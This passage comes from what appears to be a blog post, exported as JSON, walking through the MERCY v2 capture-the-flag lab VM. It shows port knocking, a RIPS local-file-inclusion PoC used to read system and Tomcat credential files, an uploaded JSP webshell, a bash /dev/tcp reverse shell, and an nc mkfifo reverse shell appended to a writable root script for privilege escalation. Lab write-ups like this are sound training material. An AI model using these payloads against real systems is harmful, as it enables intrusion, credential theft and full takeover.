folder:<\/p>\n<pre><code class=\"language-apl\">pleadformercy\nqiu\nthisisasuperduperlonguser\nfluffy\n\nqiu <\/code><\/pre>\n<p>Try connecting to take a look:<\/p>\n<pre><code class=\"language-bash\">smbclient \\\\\\\\192.168.37.132\\\\qiu -U &quot;qiu&quot;<\/code><\/pre>\n<p>Logged in with the weak password <code>password<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401774.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401774.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325125949638\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Take a look at the downloaded files.<\/p>\n<pre><code class=\"language-bash\"># configprint\n#!\/bin\/bash\n\necho &quot;Here are settings for your perusal.&quot; &gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;Port Knocking Daemon Configuration&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\ncat &quot;\/etc\/knockd.conf&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;Apache2 Configuration&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\ncat &quot;\/etc\/apache2\/apache2.conf&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;Samba Configuration&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\ncat &quot;\/etc\/samba\/smb.conf&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;For other details of MERCY, please contact your system administrator.&quot; &gt;&gt; config\n\nchown qiu:qiu config<\/code><\/pre>\n<p>It includes a <code>config<\/code> file; that file is too long, so we look for the parts that are useful to us:<\/p>\n<pre><code class=\"language-text\">Here are settings for your perusal.\n\nPort Knocking Daemon Configuration\n\n[options]\n        UseSyslog\n\n[openHTTP]\n        sequence    = 159,27391,4\n        seq_timeout = 100\n        command     = \/sbin\/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT\n        tcpflags    = syn\n\n[closeHTTP]\n        sequence    = 4,27391,159\n        seq_timeout = 100\n        command     = \/sbin\/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT\n        
tcpflags    = syn\n\n[openSSH]\n        sequence    = 17301,28504,9999\n        seq_timeout = 100\n        command     = \/sbin\/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT\n        tcpflags    = syn\n\n[closeSSH]\n        sequence    = 9999,28504,17301\n        seq_timeout = 100\n        command     = \/sbin\/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT\n        tcpflags    = syn<\/code><\/pre>\n<p>So this is why those ports showed as filtered in the scan above: they have to be opened with <code>knock<\/code>! Continue looking at the downloaded files:<\/p>\n<pre><code class=\"language-text\"># readme.txt\nThis is for your own eyes only. In case you forget the magic rules for remote administration.<\/code><\/pre>\n<p>Try knocking on the ports:<\/p>\n<pre><code class=\"language-bash\">knock 192.168.37.132 159 27391 4\nknock 192.168.37.132 17301 28504 9999<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401775.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401775.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325130720144\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>The ports are open now!<\/p>\n<h3>Inspecting Port 80<\/h3>\n<pre><code class=\"language-text\">This machine shall make you plead for mercy! Bwahahahahaha! 
<\/code><\/pre>\n<p>Scan it:<\/p>\n<pre><code>nmap -sCV -p 80 192.168.37.132<\/code><\/pre>\n<pre><code class=\"language-apl\">PORT   STATE SERVICE VERSION\n80\/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: Apache\/2.4.7 (Ubuntu)\n| http-robots.txt: 2 disallowed entries \n|_\/mercy \/nomercy<\/code><\/pre>\n<p>Found two directories, <code>mercy<\/code> and <code>nomercy<\/code>:<\/p>\n<pre><code class=\"language-text\"># http:\/\/192.168.37.132\/mercy\/index\nWelcome to Mercy!\n\nWe hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401776.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401776.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325131406077\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Looked up what this RIPS thing is:<\/p>\n<blockquote>\n<p><code>RIPS - A static source code analyser for vulnerabilities in PHP scripts<\/code><\/p>\n<p>RIPS is the most popular static code analysis tool to automatically detect vulnerabilities in PHP applications. 
By tokenizing and parsing all source code files, RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by userinput (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities, RIPS offers an integrated code audit framework.<\/p>\n<p><code>IPS-\u9488\u5bf9PHP\u811a\u672c\u4e2d\u6f0f\u6d1e\u7684\u9759\u6001\u6e90\u4ee3\u7801\u5206\u6790\u5668<\/code><\/p>\n<p>RIPS\u662f\u6700\u6d41\u884c\u7684\u9759\u6001\u4ee3\u7801\u5206\u6790\u5de5\u5177\uff0c\u7528\u4e8e\u81ea\u52a8\u68c0\u6d4bPHP\u5e94\u7528\u7a0b\u5e8f\u4e2d\u7684\u6f0f\u6d1e\u3002\u901a\u8fc7\u6807\u8bb0\u5316\u548c\u89e3\u6790\u6240\u6709\u6e90\u4ee3\u7801\u6587\u4ef6\uff0cRIPS\u80fd\u591f\u5c06PHP\u6e90\u4ee3\u7801\u8f6c\u6362\u4e3a\u7a0b\u5e8f\u6a21\u578b\uff0c\u5e76\u68c0\u6d4b\u5728\u7a0b\u5e8f\u6d41\u671f\u95f4\u53ef\u80fd\u88ab\u7528\u6237\u8f93\u5165(\u53d7\u6076\u610f\u7528\u6237\u5f71\u54cd)\u6c61\u67d3\u7684\u654f\u611f\u63a5\u6536\u5668(\u6f5c\u5728\u6613\u53d7\u653b\u51fb\u7684\u51fd\u6570)\u3002\u9664\u4e86\u7ed3\u6784\u5316\u8f93\u51fa\u53d1\u73b0\u7684\u6f0f\u6d1e\u5916\uff0cRIPS\u8fd8\u63d0\u4f9b\u4e86\u4e00\u4e2a\u96c6\u6210\u7684\u4ee3\u7801\u5ba1\u8ba1\u6846\u67b6\u3002<\/p>\n<\/blockquote>\n<p>\u4e0d\u7ba1\u5b83\u662f\u5565\uff0c\u5b83\u6f0f\u4e86\u7248\u672c\uff0c\u627e\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401777.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401777.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325131802413\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u9614\u4ee5\uff0c\u4e0b\u8f7d\u4e0b\u6765\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># RIPS &lt;= 0.53 Multiple Local File Inclusion Vulnerabilities\n# Google Dork: allintitle: &quot;RIPS - A static source code analyser for\nvulnerabilities in PHP scripts&quot;\n# Althout this script is not intended to be accesible from internet, there\nare some websites that host it.\n# Download: http:\/\/sourceforge.net\/projects\/rips-scanner\/\n# Date: 23\/03\/12\n# Contact: mattdch0@gmail.com\n# Follow: @mattdch\n# www.localh0t.com.ar\n\nFile: \/windows\/code.php\n=======================\n\n102: file $lines = file($file);\n    96: $file = $_GET[&#039;file&#039;];\n\nPoC:\nhttp:\/\/localhost\/rips\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/etc\/passwd\n\nFile: \/windows\/function.php\n===========================\n\n    64: file $lines = file($file);\n        58: $file = $_GET[&#039;file&#039;];\n\nPoC:\nhttp:\/\/localhost\/rips\/windows\/function.php?file=..\/..\/..\/..\/..\/..\/etc\/passwd(will\nread the first line of the file) <\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u8fd9\u4e2a<code>PoC<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401778.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401778.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325132021802\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u9614\u4ee5\uff01\u6839\u636e8080\u7aef\u53e3\u5f97\u5230\u7684\u63d0\u793a\uff0c\u5c1d\u8bd5\u662f\u5426\u53ef\u4ee5\u5305\u542b<code>tomcat<\/code>\u7684\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401779.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401779.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325132436756\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.37.132\/nomercy\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/usr\/local\/tomcat\/tomcat7\/conf\/tomcat-users.xml\nhttp:\/\/192.168.37.132\/nomercy\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/home\/qiu\/.tomcat\/conf\/tomcat-users.xml\nhttp:\/\/192.168.37.132\/nomercy\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/etc\/tomcat7\/tomcat-users.xml<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401781.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401781.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325133430764\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u83b7\u5f97\u5230\u4e86\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">thisisasuperduperlonguser\nheartbreakisinevitable\n\nfluffy\nfreakishfluffybunny<\/code><\/pre>\n<h3>\u767b\u5f55\u4e0a\u4f20shell<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401782.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401782.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325133535522\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u767b\u5f55\u4e0a\u6765\u4e86\u4ee5\u540e\uff0c\u5c1d\u8bd5\u4e0a\u4f20<code>Jsp<\/code>\u6728\u9a6c\uff1a<\/p>\n<pre><code class=\"language-php\">\/\/ exp.jsp =&gt; exp.war\n&lt;%!\n    class U extends ClassLoader {\n        U(ClassLoader c) {\n            super(c);\n        }\n        public Class g(byte[] b) {\n            return super.defineClass(b, 0, b.length);\n        }\n    }\n\n    public byte[] 
base64Decode(String str) throws Exception {\n        try {\n            Class clazz = Class.forName(&quot;sun.misc.BASE64Decoder&quot;);\n            return (byte[]) clazz.getMethod(&quot;decodeBuffer&quot;, String.class).invoke(clazz.newInstance(), str);\n        } catch (Exception e) {\n            Class clazz = Class.forName(&quot;java.util.Base64&quot;);\n            Object decoder = clazz.getMethod(&quot;getDecoder&quot;).invoke(null);\n            return (byte[]) decoder.getClass().getMethod(&quot;decode&quot;, String.class).invoke(decoder, str);\n        }\n    }\n%&gt;\n&lt;%\n    String cls = request.getParameter(&quot;hack&quot;);\n    if (cls != null) {\n        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);\n    }\n%&gt;<\/code><\/pre>
\n<p>After uploading <code>exp.war<\/code>, connect to it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401783.png\" alt=\"image-20240325133844681\" \/><\/p>\n<p>Connect with AntSword:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401784.png\" alt=\"image-20240325134443051\" \/><\/p>\n<p>Send a reverse shell back to Kali:<\/p>\n<pre><code class=\"language-bash\"># tomcat\nbash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/10.161.181.188\/1234 &lt;&amp;1&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\"># kali\nnc -lvvp 1234<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401785.png\" alt=\"image-20240325134653484\" \/><\/p>
\n<h2>Privilege escalation<\/h2>\n<h3>Switching to fluffy<\/h3>\n<p>The file inclusion earlier turned up this user:<\/p>\n<pre><code class=\"language-text\">fluffy\nfreakishfluffybunny<\/code><\/pre>\n<p>See whether we can switch to it:<\/p>\n<pre><code class=\"language-bash\">tomcat7@MERCY:\/var\/lib\/tomcat7$ su fluffy    
\nsu fluffy\nsu: must be run from a terminal<\/code><\/pre>\n<p>Upgrade the shell to a pseudo-terminal:<\/p>\n<pre><code class=\"language-bash\">python -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;<\/code><\/pre>\n<p>Switch again:<\/p>\n<pre><code class=\"language-bash\">tomcat7@MERCY:\/var\/lib\/tomcat7$ su fluffy\nsu fluffy\nPassword: freakishfluffybunny\n\nAdded user fluffy.\n\n$ whoami;id\nwhoami;id\nfluffy\nuid=1003(fluffy) gid=1003(fluffy) groups=1003(fluffy)<\/code><\/pre>
\n<h3>Information gathering<\/h3>\n<h4>Basic enumeration<\/h4>\n<pre><code class=\"language-bash\">$ whoami;id\nwhoami;id\nfluffy\nuid=1003(fluffy) gid=1003(fluffy) groups=1003(fluffy)\n$ python -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;\npython -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;\nfluffy@MERCY:\/var\/lib\/tomcat7$ sudo -l\nsudo -l\n[sudo] password for fluffy: freakishfluffybunny\n\nSorry, user fluffy may not run sudo on MERCY.\nfluffy@MERCY:\/var\/lib\/tomcat7$ cat \/etc\/cron*\ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user  command\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nfluffy@MERCY:\/var\/lib\/tomcat7$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\nfind \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/sbin\/pppd\n\/usr\/sbin\/uuidd\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/authbind\/helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/landscape\/apt-update\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/procmail\n\/usr\/bin\/chfn\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/lppasswd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/at\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/bin\/pkexec\n\/usr\/bin\/mtr\n\/sbin\/mount.cifs\n\/bin\/umount\n\/bin\/ping\n\/bin\/mount\n\/bin\/fusermount\n\/bin\/ping6\n\/bin\/su<\/code><\/pre>
\n<h4>Checking sensitive directories<\/h4>\n<pre><code class=\"language-bash\">fluffy@MERCY:\/var\/lib\/tomcat7$ cd \/home\/fluffy\ncd \/home\/fluffy\nfluffy@MERCY:~$ ls -la\nls -la\ntotal 16\ndrwxr-x--- 3 fluffy fluffy 4096 Nov 20  2018 .\ndrwxr-xr-x 6 root   root   4096 Nov 20  2018 ..\n-rw------- 1 fluffy fluffy   12 Nov 20  2018 .bash_history\ndrwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 .private\nfluffy@MERCY:~$ cd .private\ncd .private\nfluffy@MERCY:~\/.private$ ls -la\nls -la\ntotal 12\ndrwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 .\ndrwxr-x--- 3 fluffy fluffy 4096 Nov 20  2018 ..\ndrwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 secrets\nfluffy@MERCY:~\/.private$ cd secrets\ncd secrets\nfluffy@MERCY:~\/.private\/secrets$ ls -la\nls -la\ntotal 20\ndrwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .\ndrwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..\n-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save\n-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets\n-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock\nfluffy@MERCY:~\/.private\/secrets$ cat backup.save\ncat backup.save\n#!\/bin\/bash\n\necho Backing Up Files;\n\nfluffy@MERCY:~\/.private\/secrets$ cat .secret\ncat .secret\ncat: .secret: No such file or directory\nfluffy@MERCY:~\/.private\/secrets$ cat .secrets\ncat .secrets\nTry harder!\nfluffy@MERCY:~\/.private\/secrets$ cat timeclock\ncat timeclock\n#!\/bin\/bash\n\nnow=$(date)\necho &quot;The system time is: $now.&quot; &gt; ..\/..\/..\/..\/..\/var\/www\/html\/time\necho &quot;Time check courtesy of LINUX&quot; &gt;&gt; ..\/..\/..\/..\/..\/var\/www\/html\/time\nchown www-data:www-data ..\/..\/..\/..\/..\/var\/www\/html\/time<\/code><\/pre>
\n<p>Found the way in! Most of these files are uninteresting, but the last one, <code>timeclock<\/code>, is owned by root and we can edit it (it is world-writable). Try sending a reverse shell back to Kali!<\/p>\n<pre><code class=\"language-bash\">echo &quot;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.161.181.188 2345 &gt;\/tmp\/f&quot; &gt;&gt; timeclock<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401786.png\" alt=\"image-20240325140037837\" \/><\/p>\n<p>Got root!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>DIGITALWORLD.LOCAL: MERCY V2 Information gathering Port scanning Scan the ports: sudo nma [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-462","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"]}